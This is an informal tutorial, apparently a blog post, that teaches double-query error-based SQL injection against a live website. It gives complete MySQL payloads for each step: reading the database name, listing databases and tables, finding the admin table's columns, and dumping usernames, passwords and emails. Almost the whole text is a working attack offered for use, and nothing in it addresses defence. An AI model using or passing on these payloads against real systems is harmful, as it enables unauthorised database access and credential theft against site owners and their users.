hello friends,Today we are gonna see about double query based sql injection

  • here is the url

  • now find the injection point
  • here is how i got the injection point

  • now the next step is to check whether we can extract database using union based command or not...but i don't get the details using the union based injection

  • now we can learn about double query based sql injection

step 1: to find the current database name

COMMAND: 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)


step 2:to find user name use user(), version-->version()

  • you can get the list of database name using this command
+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

in this command check for "LIMIT N,1"

you have to increment the N value from 0 to no.of databases in that site

ex:i used limit 0,1 

 -->limit 1,1

there are only two databases :-p

i can't increment further

this is how you get the list of databases

step 3: now to find the list of table in the particular database

+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=<HEX_VLAUE_OF_DB_NAME> LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

<HEX_VLAUE_OF_DB_NAME>--->here our database name is advance

hex value is CHAR(97, 100, 118, 97, 110, 99, 101)

like the previous step you need to increment the N value to get the list of tables in that particular database

limit 1,1 gives admin table :-p

step 4: now the next step is to find column name for the admin table

+and(select 1 FROM(select count(*),concat((select (select (select distinct concat(cast(column_name as char)) FROM information_schema.columns WHERE table_schema=<HEX_VLAUE_OF_DB_NAME> AND table_name=<HEX_VLAUE_OF_TABLE_NAME> LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

<HEX_VLAUE_OF_DB_NAME>----->CHAR(97, 100, 118, 97, 110, 99, 101)
<HEX_VLAUE_OF_TABLE_NAME>--->CHAR(97, 100, 109, 105, 110)

as like the previous step you need to increment the N value to get list of column name

limit 0,1-->username1

limit 1,1-->password1

step 5: last step is to dump the values :-p

+and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,username,0x3a,password,0x3a,email,0x3a) FROM <TABLE_NAME>+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)

